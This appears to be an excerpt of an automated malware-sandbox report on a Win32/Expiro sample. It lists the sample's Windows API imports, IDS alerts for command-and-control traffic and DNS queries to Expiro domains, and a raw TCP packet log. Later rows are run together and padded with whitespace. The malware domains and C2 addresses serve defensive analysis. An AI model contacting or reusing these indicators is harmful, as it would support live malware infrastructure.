ADVAPI32.dll | RegQueryInfoKeyW, OpenProcessToken, RegEnumKeyExW, RegEnumValueW, RegQueryValueW, RegEnumKeyW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegOpenKeyExW, SetTokenInformation, AllocateAndInitializeSid, GetLengthSid, DuplicateTokenEx, RegCloseKey, RegQueryValueExA, RegSetValueExW, RegQueryInfoKeyA, RegOpenKeyExA, RegQueryValueExW, RegEnumKeyExA, LookupPrivilegeValueW, InitiateSystemShutdownW, AdjustTokenPrivileges
SHELL32.dll | ShellExecuteExW, SHFileOperationA, SHGetSpecialFolderPathW, DragFinish, DragQueryFileW, ShellExecuteW, SHGetFileInfoW, SHAppBarMessage, SHGetDesktopFolder, SHBrowseForFolderW, SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHGetMalloc
COMCTL32.dll | InitCommonControlsEx
SHLWAPI.dll | PathFindExtensionW, PathFindFileNameW, PathRemoveFileSpecW, PathIsUNCW, StrFormatKBSizeW, PathStripToRootW, PathFileExistsW
UxTheme.dll | DrawThemeBackground, GetThemeColor, GetCurrentThemeName, IsAppThemed, CloseThemeData, DrawThemeText, GetWindowTheme, GetThemePartSize, IsThemeBackgroundPartiallyTransparent, GetThemeSysColor, OpenThemeData, DrawThemeParentBackground
ole32.dll | IsAccelerator, OleTranslateAccelerator, OleDestroyMenuDescriptor, OleCreateMenuDescriptor, OleUninitialize, CoFreeUnusedLibraries, OleLockRunning, RevokeDragDrop, RegisterDragDrop, OleGetClipboard, DoDragDrop, OleIsCurrentClipboard, OleFlushClipboard, CreateILockBytesOnHGlobal, CoLockObjectExternal, StgOpenStorageOnILockBytes, StgCreateDocfileOnILockBytes, CoGetClassObject, CoDisconnectObject, CreateStreamOnHGlobal, ReleaseStgMedium, OleDuplicateData, CoTaskMemFree, CoTaskMemAlloc, CLSIDFromProgID, CoInitialize, CoCreateInstance, CoCreateGuid, CLSIDFromString, CoInitializeEx, CoUninitialize, CoRevokeClassObject, CoRegisterMessageFilter, OleInitialize
OLEAUT32.dll | SysFreeString, SysAllocStringLen, VariantInit, VariantClear, VariantChangeType, SysAllocString, SystemTimeToVariantTime, VariantTimeToSystemTime, SafeArrayDestroy, SysStringLen, LoadTypeLib, OleCreateFontIndirect, VarBstrFromDate, VariantCopy
oledlg.dll | OleUIBusyW
gdiplus.dll | GdipDrawImageRectI, GdipSetInterpolationMode, GdipCreateFromHDC, GdipCreateBitmapFromHBITMAP, GdipDrawImageI, GdipDeleteGraphics, GdipBitmapUnlockBits, GdipBitmapLockBits, GdiplusShutdown, GdipAlloc, GdipFree, GdiplusStartup, GdipCloneImage, GdipDisposeImage, GdipGetImageGraphicsContext, GdipGetImageWidth, GdipGetImageHeight, GdipGetImagePixelFormat, GdipGetImagePalette, GdipGetImagePaletteSize, GdipCreateBitmapFromStream, GdipCreateBitmapFromScan0
SETUPAPI.dll | CM_Reenumerate_DevNode_Ex, CM_Locate_DevNode_ExW, SetupDiEnumDeviceInfo, SetupDiGetDeviceRegistryPropertyW, SetupDiGetClassDevsW, SetupCloseInfFile, SetupFindFirstLineA, SetupFindNextLine, SetupGetMultiSzFieldA, SetupOpenInfFileW, SetupGetStringFieldA, SetupDiDestroyDeviceInfoList
USERENV.dll | CreateEnvironmentBlock
newdev.dll | UpdateDriverForPlugAndPlayDevicesW
OLEACC.dll | CreateStdAccessibleObject, LresultFromObject, AccessibleObjectFromWindow
IMM32.dll | ImmReleaseContext, ImmGetOpenStatus, ImmGetContext
WINMM.dll | PlaySoundW
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-28T16:50:00.848951+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 54.244.188.177 | 80 | 192.168.2.5 | 49705 | TCP
2024-10-28T16:50:00.848951+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 54.244.188.177 | 80 | 192.168.2.5 | 49705 | TCP
2024-10-28T16:50:02.388480+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 18.141.10.107 | 80 | 192.168.2.5 | 49707 | TCP
2024-10-28T16:50:02.388480+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 18.141.10.107 | 80 | 192.168.2.5 | 49707 | TCP
2024-10-28T16:50:03.407124+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.5 | 49709 | 44.221.84.105 | 80 | TCP
2024-10-28T16:50:04.593285+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 44.221.84.105 | 80 | 192.168.2.5 | 49711 | TCP
2024-10-28T16:50:04.593285+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 44.221.84.105 | 80 | 192.168.2.5 | 49711 | TCP
2024-10-28T16:50:04.596830+0100 | 2051648 | ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) | 1 | 192.168.2.5 | 62067 | 1.1.1.1 | 53 | UDP
2024-10-28T16:50:06.156760+0100 | 2051649 | ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) | 1 | 192.168.2.5 | 64098 | 1.1.1.1 | 53 | UDP
2024-10-28T16:50:43.727257+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 47.129.31.212 | 80 | 192.168.2.5 | 49919 | TCP
2024-10-28T16:50:43.727257+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 47.129.31.212 | 80 | 192.168.2.5 | 49919 | TCP
2024-10-28T16:50:45.659876+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 13.251.16.150 | 80 | 192.168.2.5 | 49930 | TCP
2024-10-28T16:50:45.659876+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 13.251.16.150 | 80 | 192.168.2.5 | 49930 | TCP
2024-10-28T16:50:51.190177+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 34.246.200.160 | 80 | 192.168.2.5 | 49966 | TCP
2024-10-28T16:50:51.190177+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 34.246.200.160 | 80 | 192.168.2.5 | 49966 | TCP
2024-10-28T16:50:52.166217+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 18.208.156.248 | 80 | 192.168.2.5 | 49975 | TCP
2024-10-28T16:50:52.166217+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 18.208.156.248 | 80 | 192.168.2.5 | 49975 | TCP
2024-10-28T16:50:58.470918+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 35.164.78.200 | 80 | 192.168.2.5 | 50002 | TCP
2024-10-28T16:50:58.470918+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 35.164.78.200 | 80 | 192.168.2.5 | 50002 | TCP
2024-10-28T16:50:59.362254+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 3.94.10.34 | 80 | 192.168.2.5 | 50003 | TCP
2024-10-28T16:50:59.362254+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 3.94.10.34 | 80 | 192.168.2.5 | 50003 | TCP
2024-10-28T16:51:04.096495+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 34.211.97.45 | 80 | 192.168.2.5 | 50006 | TCP
2024-10-28T16:51:04.096495+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 34.211.97.45 | 80 | 192.168.2.5 | 50006 | TCP
2024-10-28T16:51:12.183078+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.5 | 50012 | 18.246.231.120 | 80 | TCP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:51:12.188937+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.246.231.12080192.168.2.550012TCP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:51:12.188937+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.246.231.12080192.168.2.550012TCP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:51:26.049079+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.254.94.18580192.168.2.550023TCP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:51:26.049079+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.254.94.18580192.168.2.550023TCP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:51:41.621440+01002051651ET MALWARE DNS Query to Expiro Domain (eufxebus .biz)1192.168.2.5538261.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:52:01.565340+01002051653ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz)1192.168.2.5530341.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:52:07.869496+01002051654ET MALWARE DNS Query to Expiro Domain (cikivjto .biz)1192.168.2.5551311.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:52:12.523104+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.55006818.208.156.24880TCP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:52:15.882417+01002051650ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz)1192.168.2.5582351.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:52:38.611879+01002051652ET MALWARE DNS Query to Expiro Domain (napws .biz)1192.168.2.5607101.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:52:54.306362+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.5530171.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:52:55.922346+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.5618251.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:52:55.944670+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.5618251.1.1.153UDP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.472599983 CET4970880192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.478205919 CET804970854.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.478260994 CET4970880192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.692472935 CET4970980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.697990894 CET804970944.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.698312998 CET4970980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.698465109 CET4970980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.698534966 CET4970980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.705987930 CET804970944.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.706002951 CET804970944.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.732785940 CET4971080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.740106106 CET804971054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.740196943 CET4971080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.740437031 CET4971080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.740464926 CET4971080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.747560024 CET804971054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.747575998 CET804971054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.372359991 CET804970944.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.407058954 CET804970944.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.407124043 CET4970980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.586586952 CET804971054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.586729050 CET4971080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.592648983 CET804971054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.592709064 CET4971080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.712305069 CET4971180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.919926882 CET804971144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.920023918 CET4971180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.920277119 CET4971180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.920291901 CET4971180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.925868988 CET804971144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.925899982 CET804971144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:04.587095022 CET804971144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:04.587332010 CET4971180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:04.593285084 CET804971144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:04.593383074 CET4971180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:04.651236057 CET4971380192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:04.656694889 CET8049713172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:04.656956911 CET4971380192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:04.656956911 CET4971380192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:04.656980991 CET4971380192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:04.662329912 CET8049713172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:04.662341118 CET8049713172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:05.319967031 CET8049713172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:05.320099115 CET4971380192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:05.348968029 CET4971380192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:05.354357958 CET8049713172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:05.410794020 CET4971980192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:05.416110992 CET8049719172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:05.416186094 CET4971980192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:05.416445971 CET4971980192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:05.416553020 CET4971980192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:05.421839952 CET8049719172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:05.421881914 CET8049719172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:06.110512972 CET8049719172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:06.110600948 CET4971980192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:06.110693932 CET4971980192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:06.116477966 CET8049719172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:06.189582109 CET4972080192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:06.195058107 CET804972018.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:45.907183886 CET4994180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:45.907524109 CET4994180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:45.907537937 CET4994180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:45.913147926 CET804994144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:45.913567066 CET804994144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:46.573523045 CET804994144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:46.573682070 CET4994180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:46.579859972 CET804994144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:46.579904079 CET4994180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:46.817002058 CET4994780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:46.822444916 CET804994718.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:46.822643042 CET4994780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:46.822643995 CET4994780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:46.822664022 CET4994780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:46.828026056 CET804994718.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:46.828378916 CET804994718.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:48.250859976 CET804994718.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:48.254626036 CET4994780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:48.261055946 CET804994718.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:48.262475967 CET4994780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:48.577675104 CET4995880192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:48.585434914 CET8049958172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:48.585516930 CET4995880192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:48.585644007 CET4995880192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:48.585679054 CET4995880192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:48.594429016 CET8049958172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:48.596414089 CET8049958172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.261387110 CET8049958172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.261446953 CET4995880192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.261475086 CET4995880192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.267091990 CET8049958172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.295913935 CET4996080192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.301700115 CET8049960172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.301812887 CET4996080192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.301923990 CET4996080192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.302012920 CET4996080192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.307583094 CET8049960172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.307919025 CET8049960172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.966682911 CET8049960172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.966742992 CET4996080192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.966779947 CET4996080192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.972404003 CET8049960172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:50.199840069 CET4996680192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:50.205981970 CET804996634.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:50.206052065 CET4996680192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:50.206497908 CET4996680192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:50.206515074 CET4996680192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:50.211904049 CET804996634.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:50.212007999 CET804996634.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:51.183917046 CET804996634.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:51.184058905 CET4996680192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:51.190176964 CET804996634.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:51.190756083 CET4996680192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:51.444209099 CET4997580192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:51.454504013 CET804997518.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:51.454588890 CET4997580192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:51.454699993 CET4997580192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:51.454727888 CET4997580192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:51.460031033 CET804997518.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:59.546041965 CET5000480192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:59.546065092 CET5000480192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:59.551646948 CET8050004165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:59.551661015 CET8050004165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.382225990 CET8050004165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.428179026 CET5000480192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.437275887 CET5000480192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.437294960 CET5000480192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.448057890 CET8050004165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.448488951 CET8050004165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.682236910 CET8050004165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.725114107 CET5000480192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.968503952 CET5000580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.974374056 CET805000554.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.974488020 CET5000580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.974608898 CET5000580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.974636078 CET5000580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.980513096 CET805000554.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.980612040 CET805000554.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:01.809478998 CET805000554.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:01.809628010 CET5000580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:01.815592051 CET805000554.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:01.815653086 CET5000580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:01.995723009 CET4998280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:01.995769978 CET4998280192.168.2.5208.100.26.245
